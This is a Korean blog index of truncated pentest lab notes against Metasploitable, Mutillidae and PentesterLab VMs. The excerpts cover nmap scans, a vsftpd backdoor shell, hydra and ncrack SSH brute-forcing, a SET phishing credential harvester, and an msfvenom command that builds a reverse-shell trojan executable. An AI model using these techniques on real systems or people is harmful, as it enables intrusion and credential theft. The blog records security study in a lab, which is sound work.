2018. 8. 16.

[mutillidae] mutillidae 계정 생성 및 로그인

metasploit 에 mutillidae 가 설치되어 있는데 계정을 생성해도 생성되지 않는다. 그 이유는 metasploit.accounts  라는 테이블이 존재하지 않기 때문이다. metasploit 에서 /var/www/multillidae/config.inc 에서 데이터베이스 명을 owasp10 으로 수정해야 한다. # 참조 https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide https://www.irongeek...

Continue reading

2018. 8. 8.

[metasploitable] nmap 이후 발견된 서비스에 대한 공격 테스트

공격 시나리오 : nmap 구동하고 운영 중인 서비스에 대한 모든 공격테스트를 시행한다. nmap 을 구동하고 나온 결과는 다음과 같다. # 21번 ftp p 서비스  21번 현재 kali linux 에서 meta로 ftp 접속이 되지 않는 상황이다. (원인 파악 필요) vsftpd 로 검색한 결과 다음의 모듈을 찾았고 바로 쉘이 실행된다. # 22번 ssh openssh 4.7 버전을 사용하고 있다. ssh 192.168.203.130 -l msfadmin 을 입력하면 password 입력하여...

Continue reading

2018. 8. 7.

2018. 8. 6.

[PentestrLAB] from sql to shell 취약점 점검

PentesterLab 의 from sql to shell 에 관해 취약점 점검을 해본다. 만약 대역을 지정하고 살아있는 호스트를 검색한다면 nmap -sn x.x.x.x/24 라고 검색했을텐데 나는 특정 호스트의 IP 를 알고 있기 때문에 바로 상세 스캔을 진행한다. # nmap 구동 nmap -sT -sV -A -O -v -p 1-65535 192.168.203.131 스캔 결과 80번 포트가 열려있고 Apache httpd 2.2.16 (Debian) 사용중이라는 정보를 얻을 수 있었다.  #...

Continue reading

2018. 8. 5.

metasploitable 설치

# Metasploitable 다운로드 https://sourceforge.net/projects/metasploitable/?source=typ_redirect 기본 계정 정보 (msfadmin/msfadmin) root 비밀번호는 따로 설정해야한다. sudo -s 를 통해 root로 접속한후 passwd 명령어로 루트 비밀번호를 지정한다. (toor/toor)  sudo와 su의 차이점 : sudo 는 일반사용자 자신의 비밀번호를 입력하고, su는 루트 비밀번호를 입력한다.  root 계정으로 사용자 계정 추가  - adduser test ** 추가, 윈도우 7 이미지 설치 - 90일 평가기간이 주어지므로 vmware 스냅샷 기능으로 활용하면 된다. -...

Continue reading

[Self Question] Linux 에서 윈도우로 ssh 접속

SSH, FTP 역시 윈도우 계정 정보로 로그인을 한다. 그러나 ssh 서비스는 열려 있는데 windows 계정 패스워드를 설정해놓지 않으면 로그인이 안된다. 패스워드가 있어야 로그인이 된다는 것이다. hydra 로 로그인 무차별 삽입 공격한 모습이다. 취약한 암호는 간단하게 뚫려버리므로 복잡한 암호를 사용해야 한다.  아래는 ncrack 으로 공격한 모습이다. 둘 다 결과를 빠르게 찾았다. ...

Continue reading

[kali linux] ftp 설정 및 메모 정보

kali linux 는 데비안 계열이다. debian 계열 ftp 설정에 관한 메모한다. kali 를 처음 설치했을때 ftp가 기본으로 설치되어 있지 않기 때문에 직접 설치 해야한다. - sudo apt-get install ftp - apt-get install -y vsftpd - etc/vsftpd.conf 설정   local_enable=yes  (로컬 사용자의 접속 허용 여부)   write_enable=yes (로컬 계정 사용자가 write 허용 여부)   local_umask=022 (로컬 계정 사용자용 umask) - /etc/init.d/vsftpd restart - 원격에서 접속...

Continue reading

칼리리눅스를 이용한 사회공학 공격

# setoolkit 1. 도메인 피싱 실행하게 되면 위와 같이 뜨고 1번을 선택한다. - website Attack Vectors 를 선택한다. - Credential harvester attack method 를 선택한다 - web templates 를 선택한다. 웹 템플릿 항목은 set에 내장되어 있는 구글 페이지를 사용하는 것이다. site cloner는 특정 사이트를 지정하여 해당 페이지를 복제하여 공격할 때 사용한다. - kali linux 의 IP를 입력한다.  (인터넷망으로 연결해야함) -...

Continue reading

2018. 8. 3.

ARP 패킷 분석

# ARP 패킷 분석 ARP 패킷은 LAN에서 통신을 하기 위해 IP주소(L3) 를 MAC(L2) 로 변환하기 위해 각 장치 간에 주고 받는 패킷이다. 따라서 특정 IP 의 mac 주소가 알고 싶을 때 이 arp request, arp reply 를 통하여 mac 주소를 확인 할 수 있다. 그러면 어떻때 ARP 프로토콜을 사용하는가. (출처 https://m.blog.naver.com/PostView.nhn?blogId=pomm88&logNo=150142212019&proxyReferer=https%3A%2F%2Fwww.google.co.kr%2F) 내부...

Continue reading

2018. 8. 2.

트로이 목마 제작 (backdoor)

# 트로이 목마 제작-1  프로그램을 실행함과 동시에 리버스 커넥션을 통해 쉘을 탈취하는 트로이 목마를 제작해본다. * msfvenom 사용 msfvenom 메타스플로잇의 부가기능으로 제공되는 프로그램이다. 각종 페이로드를 생성ㅎ할 수 있는 프로그램이다. 공격할때 사용되는 쉘코드, exe 실행파일 형태로 공격파일을 생성 할 수 있다. msfvenom -p windows/meterpreter/reverse_tcp LHOST=로컬 ip LPORT=4444 -f exe > bad.exe exe 포맷으로 사용자가...

Continue reading

Popular Posts

Recent Posts

Powered by Blogger.